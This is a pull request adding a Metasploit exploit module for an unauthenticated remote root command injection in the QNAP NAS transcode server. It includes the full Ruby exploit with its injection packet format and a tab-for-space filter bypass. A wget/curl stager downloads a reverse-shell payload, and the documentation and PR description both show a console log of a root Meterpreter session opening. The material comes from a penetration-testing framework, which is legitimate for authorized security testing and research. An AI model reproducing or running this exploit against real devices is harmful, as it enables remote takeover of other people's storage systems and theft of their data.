### PR TITLE
Add QNAP Transcode Server Command Execution exploit module

### DIFF
--- a/documentation/modules/exploit/linux/misc/qnap_transcode_server.md
+++ b/documentation/modules/exploit/linux/misc/qnap_transcode_server.md
@@ -1,0 +1,62 @@
+## Description
+
+  This module exploits an unauthenticated remote command injection vulnerability in QNAP NAS devices. The transcoding server listens on port 9251 by default and is vulnerable to command injection using the 'rmfile' command.
+
+
+## Vulnerable Application
+
+  [QNAP](https://www.qnap.com/) designs and delivers high-quality network attached storage (NAS) and professional network video recorder (NVR) solutions to users from home, SOHO to small, medium businesses.
+
+  This module was tested successfully on a QNAP TS-431 with firmware version 4.3.3.0262 (20170727).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/misc/qnap_transcode_server`
+  3. Do: `set RHOST [IP]`
+  4. Do: `set LHOST [IP]`
+  5. Do: `run`
+  6. You should get a session
+
+
+## Options
+
+  **Delay**
+
+  How long to wait (in seconds) for the device to download the payload.
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/linux/misc/qnap_transcode_server 
+  msf exploit(qnap_transcode_server) > set rhost 10.1.1.123
+  rhost => 10.1.1.123
+  msf exploit(qnap_transcode_server) > check
+  [*] 10.1.1.123:9251 The target service is running, but could not be validated.
+  msf exploit(qnap_transcode_server) > set lhost 10.1.1.197
+  lhost => 10.1.1.197
+  msf exploit(qnap_transcode_server) > run
+
+  [*] Started reverse TCP handler on 10.1.1.197:4444 
+  [*] 10.1.1.123:9251 - Using URL: http://0.0.0.0:8080/IQrgbm
+  [*] 10.1.1.123:9251 - Local IP: http://10.1.1.197:8080/IQrgbm
+  [*] 10.1.1.123:9251 - Sent command successfully (52 bytes)
+  [*] 10.1.1.123:9251 - Waiting for the device to download the payload (30 seconds)...
+  [*] 10.1.1.123:9251 - Sent command successfully (22 bytes)
+  [*] 10.1.1.123:9251 - Sent command successfully (13 bytes)
+  [*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.123:53888) at 2017-08-13 05:05:18 -0400
+  [*] 10.1.1.123:9251 - Sent command successfully (19 bytes)
+  [*] 10.1.1.123:9251 - Command Stager progress - 100.00% done (109/109 bytes)
+  [*] 10.1.1.123:9251 - Server stopped.
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo 
+  Computer     : 10.1.1.123
+  OS           :  (Linux 3.2.26)
+  Architecture : armv7l
+  Meterpreter  : armle/linux
+  ```
+

--- a/modules/exploits/linux/misc/qnap_transcode_server.rb
+++ b/modules/exploits/linux/misc/qnap_transcode_server.rb
@@ -24,6 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'     =>
         [
           'Zenofex', # Initial vulnerability discovery and PoC
+          '0x00string', # Initial vulnerability discovery and PoC
           'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
         ],
       'License'    => MSF_LICENSE,

--- a/modules/exploits/linux/misc/qnap_transcode_server.rb
+++ b/modules/exploits/linux/misc/qnap_transcode_server.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'QNAP Transcode Server Command Execution',
+      'Description' => %q{
+        This module exploits an unauthenticated remote command injection
+        vulnerability in QNAP NAS devices. The transcoding server listens
+        on port 9251 by default and is vulnerable to command injection
+        using the 'rmfile' command.
+
+        This module was tested successfully on a QNAP TS-431 with
+        firmware version 4.3.3.0262 (20170727).
+      },
+      'Author'     =>
+        [
+          'Zenofex', # Initial vulnerability discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'License'    => MSF_LICENSE,
+      'Platform'   => 'linux',
+      'References' =>
+        [
+          [ 'URL', 'https://www.exploitee.rs/index.php/QNAP_TS-131' ],
+          [ 'URL', 'http://docs.qnap.com/nas/4.1/Home/en/index.html?transcode_management.htm' ]
+        ],
+      'DisclosureDate'  => 'Aug 6 2017',
+      'Privileged'      => true,
+      'Arch'            => ARCH_ARMLE,
+      'DefaultOptions'  =>
+        {
+          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+        },
+      'Targets'         => [['Automatic', {}]],
+      'CmdStagerFlavor' => %w{wget curl},
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        Opt::RPORT(9251),
+        OptInt.new('DELAY', [true, 'How long to wait for the device to download the payload', 30])
+      ])
+    deregister_options 'cmdstager::decoder'
+  end
+
+  def check
+    vprint_status 'Connecting to transcode server...'
+
+    connect
+    sock.put "\x01\x00\x00\x00"
+    res = sock.get_once
+
+    if res.blank?
+      vprint_status 'No reply from server'
+      return CheckCode::Safe
+    end
+
+    vprint_status "Received response: #{res}"
+
+    return CheckCode::Detected if res.to_s =~ /client's request is accepted/
+
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    vprint_error 'Connection failed'
+    return CheckCode::Unknown
+  ensure
+    disconnect
+  end
+
+  def execute_command(cmd, opts)
+    # Filtered characters: 0x20 ! $ & 0x39 , ; = [ ] ^ ` { } %
+    # Execute each command seperately
+    cmd.split(';').each do |c|
+      connect
+      vprint_status "Executing command: #{c}"
+
+      # Replace spaces with tabs
+      c.tr! ' ', "\t"
+
+      sock.put "\x01\x00\x00\x00/|#{c}|\x00"
+      res = sock.get_once
+
+      unless res.to_s =~ /client's request is accepted/
+        print_status 'Unexpected reply'
+        break
+      end
+
+      print_status "Sent command successfully (#{c.length} bytes)"
+
+      disconnect
+
+      if c =~ /^(curl|wget)/
+        print_status "Waiting for the device to download the payload (#{datastore['DELAY']} seconds)..."
+        Rex.sleep datastore['DELAY']
+      end
+    end
+  rescue ::Rex::ConnectionError
+    fail_with Failure::Unreachable, 'Failed to connect to the transcode server'
+  ensure
+    disconnect
+  end
+
+  def exploit
+    vprint_status 'Connecting to transcode server...'
+    execute_cmdstager linemax: 400
+  end
+end


### PR DESCRIPTION
This PR adds an unauthenticated remote root command injection exploit for the transcoding server enabled by default on QNAP NAS devices.

        This module exploits an unauthenticated remote command injection
        vulnerability in QNAP NAS devices. The transcoding server listens
        on port 9251 by default and is vulnerable to command injection
        using the 'rmfile' command.

        This module was tested successfully on a QNAP TS-431 with
        firmware version 4.3.3.0262 (20170727).


## Verification

* [x] Start `msfconsole`
* [x] Do: `use exploit/linux/misc/qnap_transcode_server`
* [x] Do: `set RHOST [IP]`
* [x] Do: `set LHOST [IP]`
* [x] Do: `run`
* [x] You should get a session


### Example Output

```
msf > use exploit/linux/misc/qnap_transcode_server 
msf exploit(qnap_transcode_server) > set rhost 10.1.1.123
rhost => 10.1.1.123
msf exploit(qnap_transcode_server) > check
[*] 10.1.1.123:9251 The target service is running, but could not be validated.
msf exploit(qnap_transcode_server) > set lhost 10.1.1.197
lhost => 10.1.1.197
msf exploit(qnap_transcode_server) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] 10.1.1.123:9251 - Using URL: http://0.0.0.0:8080/IQrgbm
[*] 10.1.1.123:9251 - Local IP: http://10.1.1.197:8080/IQrgbm
[*] 10.1.1.123:9251 - Sent command successfully (52 bytes)
[*] 10.1.1.123:9251 - Waiting for the device to download the payload (30 seconds)...
[*] 10.1.1.123:9251 - Sent command successfully (22 bytes)
[*] 10.1.1.123:9251 - Sent command successfully (13 bytes)
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.123:53888) at 2017-08-13 05:05:18 -0400
[*] 10.1.1.123:9251 - Sent command successfully (19 bytes)
[*] 10.1.1.123:9251 - Command Stager progress - 100.00% done (109/109 bytes)
[*] 10.1.1.123:9251 - Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo 
Computer     : 10.1.1.123
OS           :  (Linux 3.2.26)
Architecture : armv7l
Meterpreter  : armle/linux
```
